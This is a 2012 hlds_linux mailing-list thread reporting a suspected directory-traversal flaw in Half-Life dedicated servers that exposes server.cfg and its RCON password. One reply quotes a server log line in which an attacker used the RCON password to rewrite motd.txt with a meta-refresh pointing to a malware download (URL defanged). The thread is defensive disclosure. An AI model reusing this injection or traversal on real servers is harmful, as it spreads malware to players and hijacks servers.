Yes, it does.
I pointed this out to the author awhile ago privately.
Just for clarity, to make sure nobody else thinks it's a good idea, IT
IS NOT A GOOD IDEA. =)
This is the same reason that programs like sudo and ssh make it very
difficult for you to pass passwords on the command line.
There are really very few things you can do to mitigate significant
security issues like this one. The best advice is to run nothing but
game servers on the host involved.
doc wrote:
Is this an ok practice? I never thought about having my rcon password in my
file - I guess it would be more secure if you just start it up with the
rcon password in the string? Doesn't it show up when you run top/htop
though?
On Tue, Jul 3, 2012 at 12:05 PM, Ken Bateman <[email protected]> wrote:
For quite a while we have been careful to specify our tf2 rcon passwords on
the command line, not a config file, because we suspected the existence of
an exploit like this.
It's possible that the vulnerability might be in tcadmin.
-Ken
On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote:
There is an exploit in q3 engine named "q3dirtrav", which allows players
to download any of server files, including server configuration
(server.cfg).Today I found evidence of possible existence of the same
exploit in HLDS.As a company we host hundreds of servers. We received
many
reports from our customers about strange HTTP refresh meta tag in the
motd.txt of their servers, which leads to "http *//free -leaks
*com/cstrike*exe".The problem has affected several different servers,
unrelated to each other, with very different RCON passwords (but most
were
very strong).Here's what I have found in logfiles:Rcon from
178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write
<META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks
*com/cstrike*exe">This "cstrike.exe" contains some kind of a
virus.(Note: I've replaced dot with asterisk and spaces)As you can see
the
attacker knew the RCON password of each server.Then I found
"server.CFG.ztmp" file in cstrike of each server, which was attacked.For
me
that means that the attacker was able to download server.cfg exactly the
same way as maps, models or sounds.
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives,
please visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives,
please visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please
visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
--
# Jesse Molina
# Mail = [email protected]
# Cell = 1-602-323-7608
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please
visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
